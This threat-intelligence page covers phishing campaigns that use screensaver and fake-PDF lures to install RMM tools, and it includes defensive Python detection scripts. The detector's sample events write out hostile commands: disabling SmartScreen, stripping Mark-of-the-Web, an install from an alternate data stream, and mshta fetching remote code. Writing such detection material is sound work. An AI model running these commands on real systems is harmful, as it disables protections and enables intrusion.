Mallory

Spearphishing Campaigns Abuse PDF and Windows Screensaver Files to Install Legitimate RMM Tools

Tags: phishing-campaign-intelligence, remote-access-implant, initial-access-method, credential-access-method, data-exfiltration-method
Updated March 21, 2026 at 02:38 PM (3 sources)

Threat actors have been observed using spearphishing lures and non-traditional attachment types, particularly Windows screensaver (.scr) executables, to trick users into running code that silently installs legitimate remote monitoring and management (RMM) agents (e.g., SimpleHelp). ReliaQuest research described business-themed filenames (e.g., InvoiceDetails.scr, ProjectSummary.scr) delivered via links hosted on legitimate cloud services (e.g., GoFile). A screensaver is an ordinary PE executable that Windows runs exactly like an .exe, so the .scr extension helps bypass controls that filter on .exe but do not treat screensavers as executables. Once installed, the RMM tooling provides interactive remote access that can enable data theft, lateral movement, and follow-on payload deployment, including ransomware, while blending into normal IT administration traffic.

Separately, researchers also reported a spam operation using fake PDF attachments that display an error message and redirect victims to a lookalike Adobe Acrobat download flow, which installs trusted, digitally signed RMM software instead of a PDF reader to establish persistent access. A different phishing campaign used a multi-stage PDF chain hosted on reputable infrastructure (e.g., Vercel Blob) to redirect victims to a credential-harvesting page and exfiltrate stolen data via a Telegram bot. Both show attackers increasingly abusing high-reputation cloud platforms and document-based lures to evade email and web filtering, including cases where the initial email contains no malicious link at all and can pass SPF/DKIM/DMARC checks, which authenticate the sending domain and say nothing about the attachment's content.

Timeline

  1. Feb 4, 2026

    ReliaQuest publishes detection and mitigation guidance for .scr abuse

    Alongside its reporting, ReliaQuest said it could not confidently attribute the campaign and recommended treating .scr files as executables, maintaining an allowlist for approved RMM tools, and blocking non-business file-hosting services at DNS or proxy layers. These recommendations were issued in response to the observed campaign abusing screensaver files and RMM software.

  2. Feb 4, 2026

    Attackers use .scr screensavers in phishing to deploy JWrapper RMM

    ReliaQuest Threat Research reported a spear-phishing campaign in which business-themed emails lured victims to download Windows screensaver (.scr) files from consumer cloud storage. When executed, the files installed the legitimate JWrapper remote monitoring and management tool, giving attackers persistent access for follow-on activity such as data theft, lateral movement, and possible ransomware deployment.
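The checks ReliaQuest recommends above (treat .scr as an executable, decide hosting by allowlist rather than by reputation) can be expressed as a small triage routine that judges an attachment by its content, not only its name, and buckets link hosts for a DNS/proxy policy. This is an added example, not code from ReliaQuest or any other vendor cited on this page; the extension lists, the hosting-domain lists (including the assumed `public.blob.vercel-storage.com` pattern for Vercel Blob), and the sample attachment names and URLs are constructed assumptions to tune for your own environment.

```python
"""Attachment and link triage for the lure patterns on this page.

Added example, not code from ReliaQuest or any other vendor cited here.
The extension lists, hosting-domain lists and sample inputs are constructed
assumptions a defender would tune for their own environment.
"""
import struct
from urllib.parse import urlparse

# Extensions Windows executes directly regardless of icon or name; a .scr
# screensaver is an ordinary PE executable, so it belongs with .exe.
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".cmd", ".bat", ".hta",
                   ".lnk", ".vbs", ".js", ".jse", ".wsf", ".msi"}
# Containers used to smuggle the above past attachment filters.
CONTAINER_EXTS = {".iso", ".img", ".zip", ".rar", ".7z"}
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx"}
# Assumed domain lists: consumer file hosting seen in these campaigns versus
# the hosting this hypothetical business uses. Vercel Blob hostnames are
# assumed to sit under public.blob.vercel-storage.com.
CONSUMER_HOSTING = {"gofile.io", "public.blob.vercel-storage.com"}
BUSINESS_HOSTING = {"sharepoint.com", "box.com"}


def is_pe(data: bytes) -> bool:
    """Content-based executable check: 'MZ' DOS header plus a 'PE\\0\\0'
    signature at the offset stored in e_lfanew (byte 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage_attachment(name: str, content: bytes = b"") -> list[str]:
    """Return findings for one attachment, judged by name and by content."""
    findings = []
    parts = name.lower().split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    if ext in EXECUTABLE_EXTS:
        findings.append(f"executable extension {ext}")
    if ext in CONTAINER_EXTS:
        findings.append(f"container {ext} (inspect contents)")
    # Explorer hides known extensions by default, so Invoice.pdf.scr is
    # displayed to the user as Invoice.pdf.
    if len(parts) > 2 and "." + parts[-2] in DOCUMENT_EXTS:
        findings.append("document-looking double extension")
    # Content beats name: a PE renamed to .pdf is still a PE.
    if content and is_pe(content) and ext not in EXECUTABLE_EXTS:
        findings.append("PE header under non-executable extension")
    return findings


def classify_host(url: str) -> str:
    """Bucket a link's host for a DNS/proxy allowlist decision."""
    host = (urlparse(url).hostname or "").lower()

    def under(domains: set[str]) -> bool:
        return any(host == d or host.endswith("." + d) for d in domains)

    if under(CONSUMER_HOSTING):
        return "consumer file hosting"
    if under(BUSINESS_HOSTING):
        return "business hosting"
    return "other"


def fake_pe() -> bytes:
    """Constructed 128-byte buffer carrying only the headers is_pe() reads;
    it is not a loadable program."""
    buf = bytearray(0x80)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\x00\x00"
    return bytes(buf)


if __name__ == "__main__":
    # Constructed samples mirroring the lures described on the page.
    for name, body in [("InvoiceDetails.scr", fake_pe()),
                       ("ProjectSummary.pdf.scr", b""),
                       ("Report.pdf", fake_pe()),
                       ("Quarterly.pdf", b"%PDF-1.7\n"),
                       ("resume.iso", b"")]:
        print(f"{name:24} {triage_attachment(name, body)}")
    for url in ["https://gofile.io/d/abc123",
                "https://x.public.blob.vercel-storage.com/invoice.pdf",
                "https://contoso.sharepoint.com/sites/finance",
                "https://files.example.invalid/doc"]:
        print(f"{url:55} {classify_host(url)}")
```

The content check is the part worth keeping even if the extension lists change: a mail gateway or download proxy that only matches on `.exe` will pass `Report.pdf` carrying an MZ/PE header, while the eight-byte inspection above does not.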


Related Stories

Phishing Campaigns Delivering Malware via Disguised, Signed Installers and Malicious Attachments

Security researchers reported active phishing activity targeting enterprise users by impersonating routine workplace workflows (e.g., meeting invites, invoices, and document notifications) to trick recipients into running malware. One campaign used executables masquerading as *Microsoft Teams*, *Zoom*, and *Adobe Acrobat Reader* installers (e.g., `msteams.exe`, `zoomworkspace.clientsetup.exe`, `adobereader.exe`, `invite.exe`) that appeared trustworthy because they were **digitally signed** with an Extended Validation (EV) certificate issued to **TrustConnect Software PTY LTD**. Microsoft Defender telemetry attributed the activity to an unknown threat actor and assessed the approach as a deliberate, multi-wave effort designed to bypass user suspicion and basic security controls. After execution, the signed malware deployed **remote monitoring and management (RMM)** tooling—reported examples include **ScreenConnect**, **Tactical RMM**, and **Mesh Agent**—to establish persistent remote access and enable follow-on actions across affected environments. Separately, reporting also highlighted phishing lures distributing **malicious ISO attachments** embedded in job application/resumé-themed emails, reinforcing that attackers continue to rely on socially engineered business processes (recruiting and HR workflows in particular) to deliver initial payloads and gain a foothold.

1 month ago
Phishing Campaigns Weaponize Legitimate RMM Tools for Remote Access and Credential Theft

Threat researchers reported multiple phishing-driven intrusions in which attackers impersonate trusted brands and agencies to trick victims into installing legitimate remote monitoring and management (RMM) software for persistent access. In **Operation DoppelBrand**, financially motivated actor **GS7** spoofed Fortune 500 financial and technology brands (including **Wells Fargo** and **USAA**) using more than **150** lookalike domains to harvest credentials and exfiltrate data via attacker-controlled **Telegram bots**; researchers also identified nearly **200** additional domains with short registration terms, automated SSL, wildcard DNS, and brand-specific subdomains supporting the campaign. Separately, Forcepoint X-Labs described a wave of emails impersonating the **U.S. Social Security Administration** that delivers an attached `.cmd` script to weaken Windows defenses and enable silent installation of **ConnectWise ScreenConnect**. The script checks/elevates privileges, disables **Windows SmartScreen** via registry changes, removes **Mark-of-the-Web**, and uses **Alternate Data Streams (ADS)** for stealth before installing an MSI and configuring ScreenConnect (via `System.config`) to beacon to an attacker-controlled server (reported as `dof-connecttop` on port `8041`). Both activity sets highlight a recurring tradecraft pattern: **brand impersonation + scripted defense evasion + abuse of legitimate RMM tooling** (e.g., *LogMeIn Resolve*, *ScreenConnect*) to gain remote control and facilitate follow-on theft or persistence.

1 month ago
Weaponized Document Lures Used to Deliver Malware and Remote Access

Multiple reports describe threat actors using *document-themed lures* to deliver malicious payloads while evading user scrutiny and defensive controls. ASEC-reported activity shows **weaponized PDF files** distributed via phishing (e.g., “Invoice,” “Payment”) that display a decoy image or a “Failed to load PDF document” error to push victims to click through to **fake Google Drive/Adobe pages**, ultimately installing legitimate **RMM tools** (e.g., *Syncro, SuperOps, NinjaOne, ConnectWise ScreenConnect*) signed with a valid certificate to blend in as administrative software rather than obvious malware. Separately, research on **APT36 / Transparent Tribe** details a targeted espionage operation against Indian government, academic, and strategic entities using spear-phishing ZIP attachments containing **oversized LNK files masquerading as PDFs**; execution chains leverage `mshta.exe` to retrieve remote HTA content, decrypt and reconstruct payloads in memory, and deploy a RAT (tracked as **ReadWriteRAT**) with capabilities including encrypted C2, remote command execution, screenshot capture, clipboard access, and data theft. Other items in the set cover unrelated threats—WordPress SEO cloaking that selectively serves malicious content to verified Googlebot IP ranges, a vendor blog overview of **Medusa** ransomware activity, and reporting on **CrazyHunter** ransomware impacting Taiwan healthcare—indicating the commonality here is *document/SEO deception techniques*, not a single unified incident.

1 month ago
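The endpoint side of the tradecraft in the two stories above (a `.cmd` script that turns SmartScreen off through the registry, strips Mark-of-the-Web, stages a payload in an Alternate Data Stream and installs ScreenConnect; `mshta.exe` fetching remote HTA content; a screensaver run from a download folder), together with the RMM allowlist ReliaQuest recommends in the timeline, can be checked against process-creation telemetry. The following is an added example, not code from Forcepoint, ASEC, ReliaQuest or any other vendor cited on this page. It reads Sysmon-style `Image` and `CommandLine` fields; the sample events, the RMM binary-name markers and the assumption that NinjaOne is the one approved RMM product are constructed for the example.

```python
"""Process-event triage for the endpoint tradecraft described above.

Added example, not code from any vendor cited on this page. Events use
Sysmon-style field names; the events, the RMM allowlist and the binary-name
markers are constructed assumptions to tune for your own fleet.
"""
import re
from pathlib import PureWindowsPath

# Assumption: NinjaOne is the only RMM product IT has sanctioned here.
APPROVED_RMM = {"ninjarmm"}
# Substrings identifying common RMM agents in image paths or command lines.
RMM_MARKERS = ("screenconnect", "simplehelp", "meshagent", "tacticalrmm",
               "ninjarmm", "syncro", "superops", "logmein")
USER_WRITABLE = ("\\downloads\\", "\\appdata\\", "\\temp\\", "\\users\\public\\")
# SmartScreenEnabled=Off under HKLM\...\CurrentVersion\Explorer disables SmartScreen.
SMARTSCREEN_OFF = re.compile(r"smartscreenenabled.*\boff\b")
# Unblock-File, or touching the Zone.Identifier stream, removes Mark-of-the-Web.
MOTW_REMOVAL = re.compile(r"unblock-file|zone\.identifier")
# A drive path whose last component carries an extra ':stream' suffix (ADS).
ADS_PATH = re.compile(r'[a-z]:\\[^\s"]*?\.\w+:[\w.-]+')
REMOTE_URL = re.compile(r"https?://\S+")


def classify_event(ev: dict) -> list[str]:
    """Return the findings for one process-creation event (empty if clean)."""
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "").lower()
    base = PureWindowsPath(image).name
    findings = []
    if base.endswith(".scr") and any(d in image for d in USER_WRITABLE):
        findings.append("screensaver executed from user-writable path")
    if SMARTSCREEN_OFF.search(cmd):
        findings.append("SmartScreen disabled via registry")
    if MOTW_REMOVAL.search(cmd):
        findings.append("Mark-of-the-Web removal")
    if ADS_PATH.search(cmd):
        findings.append("alternate data stream referenced")
    if base == "mshta.exe" and REMOTE_URL.search(cmd):
        findings.append("mshta fetching remote content")
    for marker in RMM_MARKERS:
        if (marker in image or marker in cmd) and marker not in APPROVED_RMM:
            findings.append(f"unapproved RMM agent: {marker}")
    return findings


def triage(events: list[dict]) -> dict[int, list[str]]:
    """Map event index to findings, keeping only events with findings."""
    result = {}
    for i, ev in enumerate(events):
        findings = classify_event(ev)
        if findings:
            result[i] = findings
    return result


# Constructed events mirroring the behaviors described in the stories above.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\bob\Downloads\InvoiceDetails.scr",
     "CommandLine": r'"C:\Users\bob\Downloads\InvoiceDetails.scr" /S'},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer /v SmartScreenEnabled /t REG_SZ /d Off /f"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -c "Unblock-File C:\Users\bob\Downloads\SSA_Notice.cmd"'},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Users\Public\notes.txt:ScreenConnect.ClientSetup.msi /qn"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://files.example.invalid/report.hta"},
    {"Image": r"C:\Program Files\NinjaRMMAgent\NinjaRMMAgent.exe",
     "CommandLine": "NinjaRMMAgent.exe"},
]

if __name__ == "__main__":
    for i, findings in triage(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["Image"], findings)
```

Each rule on its own is noisy in a real fleet (administrators do run `Unblock-File`, and `msiexec` does install approved agents); the value is in correlating several of them from the same user session within a short window, which is exactly the sequence the `.cmd` chain above produces. The allowlist check is the one rule that should fire on a single event: an RMM agent that IT did not deploy has no benign explanation.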
